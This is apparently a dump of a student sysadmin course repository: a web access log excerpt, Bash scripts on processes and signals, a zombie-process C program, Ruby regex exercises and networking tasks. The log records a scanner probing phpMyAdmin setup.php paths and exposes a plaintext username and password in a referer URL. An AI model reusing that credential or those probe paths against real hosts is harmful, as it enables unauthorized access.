OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n176.151.29.143 - - [10/Feb/2016:16:38:36 -0800] \"GET /techmeup-le-monde-merveilleux-de-la-tech/ HTTP/1.1\" 200 9503 \"http://hnwathcher.com/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n176.151.29.143 - - [10/Feb/2016:16:40:50 -0800] \"GET /faut-il-apprendre-a-coder-a-lecole-ou-bien/ HTTP/1.1\" 200 9398 \"http://hnwathcher.com/techmeup-le-monde-merveilleux-de-la-tech/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n198.58.96.215 - - [10/Feb/2016:16:43:01 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n176.151.29.143 - - [10/Feb/2016:16:45:42 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://hnwathcher.com/les-francais-genies-de-la-silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n144.76.29.162 - - [10/Feb/2016:16:52:07 -0800] \"GET / HTTP/1.0\" 200 33325 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n45.55.134.13 - - [10/Feb/2016:16:54:45 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36\"\n45.55.134.13 - - [10/Feb/2016:16:54:45 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36\"\n162.243.175.81 - - [10/Feb/2016:16:59:49 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n62.210.142.23 - jez [10/Feb/2016:17:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@hnwathcher.com/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n66.249.66.44 - - [10/Feb/2016:17:08:22 -0800] \"GET /2014/09/ HTTP/1.1\" 200 6019 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n62.210.188.36 - - [10/Feb/2016:17:12:44 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n62.210.188.36 - - [10/Feb/2016:17:12:44 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25\"\n209.190.95.226 - - [10/Feb/2016:17:14:11 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"-\" \"Java/1.7.0_10\"\n23.23.19.184 - - [10/Feb/2016:17:15:28 -0800] \"GET / HTTP/1.1\" 200 33403 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)\"\n94.73.142.106 - - [10/Feb/2016:17:16:40 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n198.58.102.155 - - [10/Feb/2016:17:28:12 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n5.9.85.4 - - [10/Feb/2016:17:38:46 -0800] \"GET /robots.txt HTTP/1.0\" 200 346 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n199.119.124.45 - - [10/Feb/2016:17:41:32 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"Mozilla/5.0 (compatible; theoldreader.com; 1 subscribers; feed-id=cab69af8d42b04c85d91e979)\"\n157.55.39.82 - - [10/Feb/2016:17:42:44 -0800] \"GET /index.php?controller=product&id_product=790 HTTP/1.1\" 301 436 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n199.16.156.124 - - [10/Feb/2016:17:43:47 -0800] \"GET /a-quoi-ca-sert-un-co-fondateur-non-technique/ HTTP/1.1\" 200 10043 \"-\" \"Twitterbot/1.0\"\n94.19.55.61 - - [10/Feb/2016:17:53:05 -0800] \"GET / HTTP/1.1\" 200 33403 \"https://www.google.ru\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\"\n2.1.201.36 - - [10/Feb/2016:18:06:19 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://hnwathcher.com/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n162.243.175.176 - - [10/Feb/2016:18:10:53 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n149.254.250.232 - - [10/Feb/2016:18:13:39 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; SAMSUNG GT-I9100/I9100XWMS2 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n149.254.250.232 - - [10/Feb/2016:18:13:39 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; SAMSUNG GT-I9100/I9100XWMS2 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n198.58.102.49 - - [10/Feb/2016:18:17:24 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n54.197.178.93 - - [10/Feb/2016:18:33:46 -0800] \"GET / HTTP/1.1\" 200 33403 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)\"\n178.137.17.196 - - [10/Feb/2016:18:39:53 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29485 \"http://www.auto-moto-elektronika.cz/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)\"\n157.55.39.218 - - [10/Feb/2016:18:45:55 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n185.130.5.207 - - [10/Feb/2016:18:49:13 -0800] \"GET //admin/pma/scripts/setup.php HTTP/1.1\" 301 499 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:15 -0800] \"GET //myadmin/scripts/setup.php HTTP/1.1\" 301 497 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:16 -0800] \"GET //phpadmin/scripts/setup.php HTTP/1.1\" 301 498 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:17 -0800] \"GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1\" 301 506 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:19 -0800] \"GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1\" 301 502 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:20 -0800] \"GET //blog/phpmyadmin/scripts/setup.php HTTP/1.1\" 301 505 \"-\" \"-\"\n185.130.5.207 - - [10/Feb/2016:18:49:21 -0800] \"GET //php/phpmyadmin/scripts/setup.php HTTP/1.1\" 301 504 \"-\" \"-\"\n91.224.140.223 - - [10/Feb/2016:18:54:41 -0800] \"GET / HTTP/1.1\" 200 33373 \"-\" \"GuzzleHttp/6.1.0 curl/7.29.0 PHP/5.6.14\"\n62.210.142.23 - jez [10/Feb/2016:19:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@hnwathcher.com/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n92.222.20.166 - - [10/Feb/2016:19:12:06 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n180.76.15.19 - - [10/Feb/2016:19:19:22 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n2.1.201.36 - - [10/Feb/2016:19:36:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://hnwathcher.com/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.99.82 - - [10/Feb/2016:19:37:15 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n50.116.30.23 - - [10/Feb/2016:19:45:10 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n209.133.111.211 - - [10/Feb/2016:19:53:16 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"python-requests/2.2.1 CPython/2.7.3 Linux/3.2.0-56-generic\"\n"
  },
  {
    "path": "0x05-processes_and_signals/0-what-is-my-pid",
    "content": "#!/usr/bin/env bash\n# my pid\n\nsleep 5 &\necho \"$!\"\n"
  },
  {
    "path": "0x05-processes_and_signals/1-list_your_processes",
    "content": "#!/usr/bin/env bash\n# list all my currently running processes\n\n# source: https://linuxize.com/post/ps-command-in-linux/\nps -auxf\n"
  },
  {
    "path": "0x05-processes_and_signals/100-process_and_pid_file",
    "content": "#!/usr/bin/env bash\n# Process and PID file\n\nfile=\"/var/run/myscript.pid\"\n\nif [ ! -e \"$file\" ]; then\n  touch \"$file\"\nfi\n\nsleep 2 &\n\necho \"$!\" > \"$file\"\n\n# prints I hate the kill command, deletes the file and exits  when receiving a SIGTERM or SIGQUIT signal\ntrap 'echo \"I hate the kill command\"; rm \"$file\"; exit' SIGTERM SIGQUIT\n\n# prints Y U no love me?! when receiving a SIGINT signal\ntrap \"echo Y U no love me?!\" SIGINT\n\nwhile true; do\n  echo \"To infinity and beyond\"\n  sleep 2\ndone\n"
  },
  {
    "path": "0x05-processes_and_signals/101-manage_my_process",
    "content": "#!/usr/bin/env bash\n# manages manage_my_process by either starting it, stopping it or restarting it.\n\ncommand=\"$1\"\n\nif [ -z \"$command\" ]; then\n  echo \"Usage: manage_my_process {start|stop|restart}\"\n  exit\nfi\n\nif [ \"$command\" == \"start\" ]; then\n\n  bash ./manage_my_process &\n  echo \"$!\" > /var/run/my_process.pid\n  echo \"manage_my_process started\"\n\nelif [ \"$command\" == \"stop\" ]; then\n  [ -e \"/var/run/my_process.pid\" ] && pkill -f './manage_my_process' && rm /var/run/my_process.pid\n  echo \"manage_my_process stopped\"\n\nelif [ \"$command\" == \"restart\" ]; then\n\n  \"$0\" stop >& /dev/null\n  \"$0\" start >& /dev/null\n  echo \"manage_my_process restarted\"\n\nelse\n  echo \"Usage: manage_my_process {start|stop|restart}\" \nfi\n"
  },
  {
    "path": "0x05-processes_and_signals/102-zombie.c",
    "content": "#include \"stdio.h\"\n#include \"stdlib.h\"\n#include \"unistd.h\"\n\n/**\n * infinite_while - a function that runs forever and returns nothing\n * Return: 0 in the end\n*/\nint infinite_while(void)\n{\n\twhile (1)\n\t{\n\t\tsleep(1);\n\t}\n\treturn (0);\n}\n\n/**\n * main - the entry to a program that creats 5 zombie process\n * Return: 0 on sucess\n*/\nint main(void)\n{\n\tint children_processes = 0;\n\tpid_t pid;\n\n\twhile (children_processes < 5)\n\t{\n\t\tpid = fork();\n\t\tif (!pid)\n\t\t\tbreak;\n\t\tprintf(\"Zombie process created, PID: %i\\n\", (int)pid);\n\t\tchildren_processes++;\n\t}\n\tif (pid != 0)\n\t\tinfinite_while();\n\treturn (0);\n}\n"
  },
  {
    "path": "0x05-processes_and_signals/2-show_your_bash_pid",
    "content": "#!/usr/bin/env bash\n# list all bash processes\n# shellcheck disable=SC2009\nps -auxf | grep bash\n"
  },
  {
    "path": "0x05-processes_and_signals/3-show_your_bash_pid_made_easy",
    "content": "#!/usr/bin/env bash\n# PID made easy\n\npgrep -l bash\n"
  },
  {
    "path": "0x05-processes_and_signals/4-to_infinity_and_beyond",
    "content": "#!/usr/bin/env bash\n# To infinity and beyond\n\nwhile true; do\n  echo \"To infinity and beyond\"\n  sleep 2\ndone\n"
  },
  {
    "path": "0x05-processes_and_signals/5-dont_stop_me_now",
    "content": "#!/usr/bin/env bash\n# Don't stop me now\n\npgrep -f 4-to_infinity_and_beyond | xargs kill\n"
  },
  {
    "path": "0x05-processes_and_signals/6-stop_me_if_you_can",
    "content": "#!/usr/bin/env bash\n# Stop me if you can\n\npkill -f 4-to_infinity_and_beyond\n"
  },
  {
    "path": "0x05-processes_and_signals/67-stop_me_if_you_can",
    "content": "#!/usr/bin/env bash\n# Stop me if you can\n\npkill -f 7-highlander\n"
  },
  {
    "path": "0x05-processes_and_signals/7-highlander",
    "content": "#!/usr/bin/env bash\n# Highlander\n\n# print I am invincible!!! when receiving a SIGTERM signal\ntrap \"echo I am invincible!!!\" SIGTERM\n\nwhile true; do\n  echo \"To infinity and beyond\"\n  sleep 2\ndone;\n"
  },
  {
    "path": "0x05-processes_and_signals/8-beheaded_process",
    "content": "#!/usr/bin/env bash\n# Beheaded process\n\npgrep -f 7-highlander | xargs kill -9\n"
  },
  {
    "path": "0x05-processes_and_signals/README.md",
    "content": "# 0x05. Processes and signals \n\n## Resource\n\n- [Linux PID](http://www.linfo.org/pid.html)\n- [Linux process](https://www.thegeekstuff.com/2012/03/linux-processes-environment/)\n- [Linux signal](https://www.thegeekstuff.com/2012/03/linux-signals-fundamentals/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-what-is-my-pid\">0. What is my PID</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/NFCmFGcj/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-list_your_processes\">1. List your processes</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/zXW2M4SR/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-show_your_bash_pid\">2. Show your Bash PID</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/T3pRbrz9/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-show_your_bash_pid_made_easy\">3. Show your Bash PID made easy</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/4NCc3xjn/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./4-to_infinity_and_beyond\">4. To infinity and beyond</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/59rp1zBz/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./5-dont_stop_me_now\">5. Don't stop me now!</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/CMWh8vCx/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./6-stop_me_if_you_can\">6. Stop me if you can</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/2SLpdvYF/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./7-highlander\">7. Highlander</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/1z5yGXW9/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./8-beheaded_process\">8. Beheaded process</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/W4Xg8DTS/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./beheaded_process\">9. Beheaded process</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/W4Xg8DTS/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-process_and_pid_file\">10. Process and PID file</a></summary><br>\n<a href='https://postimg.cc/VdHnF6Cd' target='_blank'><img src='https://i.postimg.cc/rwqjMRyC/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./101-manage_my_process\">11. Manage my process</a></summary><br>\n<a href='https://postimg.cc/2qPfd4z2' target='_blank'><img src='https://i.postimg.cc/gJ0kWD1F/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://bashitout.com/2013/05/18/Ampersands-on-the-command-line.html\">&</a></li>\n      <li><a href=\"https://www.ghacks.net/2009/04/04/get-to-know-linux-the-etcinitd-directory/\">init.d</a></li>\n      <li><a href=\"https://en.wikipedia.org/wiki/Daemon_%28computing%29\">Daemon</a></li>\n      <li><a href=\"https://www.gnu.org/software/bash/manual/html_node/Positional-Parameters.html\">Positional parameters</a></li>\n      <li><a href=\"./manage_my_process\">manage_my_process</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n<details>\n<summary><a href=\"./102-zombie.c\">12. Zombie</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/ry1qKz2Y/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://zombieprocess.wordpress.com/what-is-a-zombie-process/\">what a zombie process is</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n"
  },
  {
    "path": "0x05-processes_and_signals/manage_my_process",
    "content": "#!/usr/bin/env bash\n# well well well\n\nfile=\"/tmp/my_process\"\n\nwhile true; do\n  echo \"I am alive!\" >> \"$file\"\n  sleep 2\ndone\n"
  },
  {
    "path": "0x06-regular_expressions/0-simply_match_school.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/School/).join\n"
  },
  {
    "path": "0x06-regular_expressions/1-repetition_token_0.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/hbt{2,5}n/).join\n"
  },
  {
    "path": "0x06-regular_expressions/100-textme.rb",
    "content": "#!/usr/bin/env ruby\n\nfrom = ARGV[0].scan(/from:(.*?)\\]/)\nto = ARGV[0].scan(/to:(.*?)\\]/)\nflags = ARGV[0].scan(/flags:(.*?)\\]/)\nputs [from, to, flags].join(',')\n"
  },
  {
    "path": "0x06-regular_expressions/2-repetition_token_1.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/hb?tn/).join\n"
  },
  {
    "path": "0x06-regular_expressions/3-repetition_token_2.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/hbt+n/).join\n"
  },
  {
    "path": "0x06-regular_expressions/4-repetition_token_3.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/hbt*n/).join\n"
  },
  {
    "path": "0x06-regular_expressions/5-beginning_and_end.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/^h.n$/).join\n"
  },
  {
    "path": "0x06-regular_expressions/6-phone_number.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/^\\d{10}$/).join\n"
  },
  {
    "path": "0x06-regular_expressions/7-OMG_WHY_ARE_YOU_SHOUTING.rb",
    "content": "#!/usr/bin/env ruby\nputs ARGV[0].scan(/[A-Z]*/).join\n"
  },
  {
    "path": "0x06-regular_expressions/README.md",
    "content": "# 0x06. Regular expression \n\n## Resource\n\n<details>\n<summary>Regular Expression</summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/mkcB0Yk1/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"https://www.regular-expressions.info/\">regular-expressions</a></li>\n      <li><a href=\"https://www.w3schools.com/jsref/jsref_obj_regexp.asp\">Play with regexp</a></li>\n      <li><a href=\"https://rubular.com/\">Ruby</a></li>\n      <li><a href=\"https://regex101.com/\">PHP/Javascript/Python</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n\n- [Regular expressions - basics](https://www.slideshare.net/neha_jain/introducing-regular-expressions)\n- [Regular expressions - advanced](https://www.slideshare.net/neha_jain/advanced-regular-expressions-80296518)\n- [Rubular is your best friend](https://rubular.com/)\n- [Use a regular expression against a problem: now you have 2 problems](https://blog.codinghorror.com/regular-expressions-now-you-have-two-problems/)\n- [Learn Regular Expressions with simple, interactive exercises](https://regexone.com/)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-simply_match_school.rb\">0. Simply matching School</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/1zCjqLRw/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-repetition_token_0.rb\">1. Repetition Token #0</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/dtgN5CgX/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-repetition_token_1.rb\">2. Repetition Token #1</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/QMLWH8wv/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-repetition_token_2.rb\">3. Repetition Token #2</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/6pZfHmXJ/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./4-repetition_token_3.rb\">4. Repetition Token #3</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/sf92mzKN/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./5-beginning_and_end.rb\">5. Not quite HBTN yet</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/TwdsXrMm/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./6-phone_number.rb\">6. Call me maybe</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/Kz1Hzmjv/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./7-OMG_WHY_ARE_YOU_SHOUTING.rb\">7. OMG WHY ARE YOU SHOUTING?</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/yYsypVKg/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./100-textme.rb\">8. Textme</a></summary><br>\n<a href='https://postimg.cc/3kzNT3Sb' target='_blank'><img src='https://i.postimg.cc/wBjmDvhH/image.png' border='0' alt='image'/></a>\n<ul>\n  <li>Links from screenshot\n  <ul>\n      <li><a href=\"./text_messages.log\">text messages log file</a></li>\n  </ul>\n  </li>\n</ul>\n</details>\n"
  },
  {
    "path": "0x07-networking_basics/0-OSI_model",
    "content": "2\n2\n"
  },
  {
    "path": "0x07-networking_basics/1-types_of_network",
    "content": "3\n2\n1\n"
  },
  {
    "path": "0x07-networking_basics/2-MAC_and_IP_address",
    "content": "2\n1\n"
  },
  {
    "path": "0x07-networking_basics/3-UDP_and_TCP",
    "content": "1\n2\n1\n"
  },
  {
    "path": "0x07-networking_basics/4-TCP_and_UDP_ports",
    "content": "#!/usr/bin/env bash\n# script that displays TCP and UDP listening ports\n\nnetstat -l\n"
  },
  {
    "path": "0x07-networking_basics/5-is_the_host_on_the_network",
    "content": "#!/usr/bin/env bash\n# script that pings an IP address passed as an argument\n\n# ip variable\nIP=\"${1}\"\n\n# filename variable\nfn=$(basename \"${BASH_SOURCE[@]}\")\n\nif ! [ \"$IP\" ]; then\n\techo \"Usage: ${fn} {IP_ADDRESS}\"\nelse\n\tping -c 5 \"${IP}\"\nfi\n"
  },
  {
    "path": "0x07-networking_basics/README.md",
    "content": "# 0x07. Networking basics #0\n\n## Resources\n\n- [OSI model](https://en.wikipedia.org/wiki/OSI_model)\n- [Different types of network](https://www.lifewire.com/lans-wans-and-other-area-networks-817376)\n- [LAN Network](https://en.wikipedia.org/wiki/Local_area_network)\n- [WAN Network](https://en.wikipedia.org/wiki/Wide_area_network)\n- [Internet](https://en.wikipedia.org/wiki/Internet)\n- [MAC address](https://whatismyipaddress.com/mac-address)\n- [What is an IP address](https://www.bleepingcomputer.com/tutorials/ip-addresses-explained/)\n- [Private and public address](https://www.iplocation.net/public-vs-private-ip-address)\n- [IPv4 and IPv6](https://www.webopedia.com/insights/ipv6-ipv4-difference/)\n- [Localhost](https://en.wikipedia.org/wiki/Localhost)\n- [TCP and UDP](https://www.howtogeek.com/190014/htg-explains-what-is-the-difference-between-tcp-and-udp/)\n- [TCP/UDP ports List](https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers)\n- [What is ping/ICMP](https://en.wikipedia.org/wiki/Ping_%28networking_utility%29)\n- [Positional parameters](https://wiki.bash-hackers.org/scripting/posparams)\n\n## Tasks\n\n<details>\n<summary><a href=\"./0-OSI_model\">0. OSI model</a></summary><br>\n<a href='https://postimg.cc/xJx2swkS' target='_blank'><img src='https://i.postimg.cc/MHxpGxqX/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./1-types_of_network\">1. Types of network</a></summary><br>\n<a href='https://postimg.cc/n9B3s7fw' target='_blank'><img src='https://i.postimg.cc/J0dv2c6m/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./2-MAC_and_IP_address\">2. MAC and IP address</a></summary><br>\n<a href='https://postimages.org/' target='_blank'><img src='https://i.postimg.cc/2yp2bcK1/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./3-UDP_and_TCP\">3. UDP and TCP</a></summary><br>\n<a href='https://postimg.cc/qzbdpVQh' target='_blank'><img src='https://i.postimg.cc/0yx5d9wf/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./4-TCP_and_UDP_ports\">4. TCP and UDP ports</a></summary><br>\n<a href='https://postimg.cc/v4KMtFVF' target='_blank'><img src='https://i.postimg.cc/5t401f90/image.png' border='0' alt='image'/></a>\n</details>\n\n<details>\n<summary><a href=\"./5-is_the_host_on_the_network\">5. Is the host on the network</a></summary><br>\n<a href='https://postimg.cc/PCJ2YNZy' target='_blank'><img src='https://i.postimg.cc/FHg8tLHM/image.png' border='0' alt='image'/></a>\n</details>\n"
  },
  {
    "path": "0x08-networking_basics_2/0-change_your_home_IP",
    "content": "#!/usr/bin/env bash\n# changes the following domain resolve ips\n#   localhost from 127.0.0.1 to 127.0.0.2\n#   facebook.com from 157.240.11.35 to 8.8.8.8\n\ncp /etc/hosts ~/hosts.new\necho \"127.0.0.2\t\tlocalhost\" > ~/hosts.new\necho \"8.8.8.8\t\tfacebook.com\" >> ~/hosts.new\ncp -f ~/hosts.new /etc/hosts\n"
  },
  {
    "path": "0x08-networking_basics_2/1-show_attached_IPs",
